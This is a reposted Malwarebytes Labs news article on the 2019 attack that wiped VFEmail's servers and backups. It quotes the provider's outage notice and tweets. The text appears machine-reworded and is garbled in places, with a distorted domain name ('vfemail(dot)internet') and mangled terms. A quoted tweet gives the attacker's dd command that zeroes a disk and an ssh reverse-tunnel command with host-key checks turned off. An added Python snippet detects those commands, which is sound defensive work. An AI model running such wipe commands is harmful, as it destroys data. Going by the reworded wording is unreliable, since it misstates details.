An e-mail service called VFEmail was essentially put out of business after a hack intended to erase everything in (and out of) sight.

“Yes, @VFEmail is successfully gone. It will likely not return. I never ever believed anybody would appreciate my labor of love so much that they’d wish to entirely and completely damage it.”


This wasn’t “simply” a basic website compromise, or some sort of database dump. It was something altogether worse: in other words, the total annihilation of a service and most, if not all, of its infrastructure.

What happened?

Users of VFEmail woke to the following message on the service’s site:




!!! ALERT!!!! Update Feb 11 2019


vfemail(dot)internet and mail(dot)vfemail(dot)internet are presently not available.

We have actually suffered devastating damage at the hands of a hacker, last viewed as aktv [redacted]

This individual has actually ruined all information in the United States, both backup and main systems. We are working to recuperate what information we can.

New updates 2/11/19 6pm CST:

Incoming mail is now being provided.

Webmail is up. Note: mailboxes are developed upon brand-new mail shipment. You might not have actually gotten mail if you cannot log in.

Mailboxes are brand-new, no subfolders exist.

No filters remain in location. If you produced a filter with Horde, log in to Horde, create any folders you require, click Filter, click Script, then click ‘Activate Script’.

There is no spam scanning at this time - incoming mail might be spam scanned depending upon DNS status.

Free users should not try to send out e-mail; there is presently no shipment system for free accounts. Paid accounts must be useable, consisting of Horde/Roundcube calendars and contacts.

At this time I am not sure of the status of existing mail for United States users. DO NOT TRY TO MAKE IT WORK if you have your own e-mail client.

If you reconnect your client to your brand-new mailbox, all your local mail will be lost.


Did they put word out on social media?

You bet they did, and the tweets don’t make for pleasant reading:

This is not looking great. All externally dealing with systems, of varying OS’s and remote authentication, in several information centers are down.

— VFEmail.net (@VFEmail) February 11, 2019

Caught the perp in the middle of formatting the backup server: dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559 via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@ -R -N

— VFEmail.net (@VFEmail) February 11, 2019

It might sound a little exciting to walk in on the scene of the crime, but I can assure you it’d just involve lots of “oh no” types of expression. If they’re already wiping your backups, the game is well and truly over.
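As an added example (not from the original post or from VFEmail), the two command lines quoted in the tweet above can be turned into detection logic over process-execution records. The record format, the host names and the `-R` and destination values in the sample are constructed placeholders, since the tweet as quoted here elides them.

```python
import re
import shlex

WIPE_SOURCES = {"/dev/zero", "/dev/urandom", "/dev/random"}
# Disk/partition nodes: Linux sdX, vdX, nvmeXnY; FreeBSD daN, adaN.
DISK_RE = re.compile(r"/dev/(sd[a-z]+\d*|vd[a-z]+\d*|nvme\d+n\d+(p\d+)?|a?da\d+\w*)$")
UNITS = {"": 1, "k": 1024, "m": 1024**2, "g": 1024**3}

def size(value, default=None):  # dd number such as 4194304 or 4m, else default
    m = re.fullmatch(r"(\d+)([kmg]?)", (value or "").lower())
    return int(m.group(1)) * UNITS[m.group(2)] if m else default

def check_dd(argv):
    """Flag dd writing zeros or random data straight onto a disk device."""
    ops = dict(a.split("=", 1) for a in argv[1:] if "=" in a)
    if ops.get("if") not in WIPE_SOURCES or not DISK_RE.match(ops.get("of", "")):
        return None
    bs, seek, count = size(ops.get("bs"), 512), size(ops.get("seek"), 0), size(ops.get("count"))
    return {"rule": "dd-disk-wipe", "device": ops["of"], "start_offset": seek * bs,
            "bytes": None if count is None else count * bs}

def check_ssh(argv):
    """Flag ssh that skips host-key checks and only holds a reverse tunnel (-oK=v or -o K=v)."""
    opts = dict(re.findall(r"(?:^|\s)-o\s*(\w+)=(\S+)", " ".join(argv[1:]).lower()))
    unverified = opts.get("stricthostkeychecking") == "no" and opts.get("userknownhostsfile") == "/dev/null"
    tunnel_only = "-N" in argv and any(t.startswith("-R") for t in argv)
    return {"rule": "ssh-unverified-reverse-tunnel"} if unverified and tunnel_only else None

CHECKS = {"dd": check_dd, "ssh": check_ssh}
def scan(lines):
    """Each line is '<host> <command line>'; returns (host, finding) pairs."""
    hits = []
    for line in lines:
        host, cmd = line.split(" ", 1)
        argv = shlex.split(cmd)
        check = CHECKS.get(argv[0].rsplit("/", 1)[-1]) if argv else None
        if check and (finding := check(argv)):
            hits.append((host, finding))
    return hits

# Constructed process-exec records; host names, the -R value and user@host are placeholders.
SAMPLE = [
    "backup01 dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559",
    "backup01 ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null -R 2222:localhost:22 -N user@host.example",
    "web01 dd if=/dev/zero of=/tmp/swapfile bs=1m count=512",
    "web01 ssh -N -L 5432:db.internal.example:5432 deploy@bastion.example",
]
if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

For the `dd` line from the tweet, the finding reports a write starting 4 GiB into the device and covering roughly 1.68 TB, which is the kind of context an on-call responder needs when deciding whether to pull the host off the network.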

Did they recover?

Sadly, things didn’t improve, and a few hours later the full damage report was available:

At this time, the assaulter has actually formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a significantly smaller sized dataset. NL backups by the provider were undamaged, and service ought to be up there.

— VFEmail.net (@VFEmail) February 11, 2019

All data was secured, at least, but said data essentially disappeared into thin air when it was scrubbed:

Yep, however it does not matter. They simply formatted whatever.

— VFEmail.net (@VFEmail) February 11, 2019

They also managed to destroy various VMs using different forms of authentication.

Strangely, not all VMs shared the very same authentication, however all were ruined. This was more than a multi-password through ssh exploit, and there was no ransom. Simply attack and damage.

— VFEmail.net (@VFEmail) February 11, 2019

“Simply attack and damage”

Services and websites have been attacked severely in the past, some to the point of destruction. There’s almost always an obvious reason given, or a ransom, or some other clue.

Here, it’s nothing but total destruction, with a service around since 2001 utterly ruined in the process. There’s no indication as to how they got in, or whether a critical system had no multi-factor authentication. A number of commentators have suggested this flaw may have been a way in for the attacker.

Until detailed analysis is published, it’s hard to say why this happened. Did the owner of the service aggravate a skilled hacker? Or could one of the service’s users have drawn attention from undesirable sources, with this as the end result? It’ll be interesting to find out. If you run a similar service, you may wish to consider a good offline backup system in the meantime.

The post Hacker damages VFEmail service, cleans backups appeared first on Malwarebytes Labs.

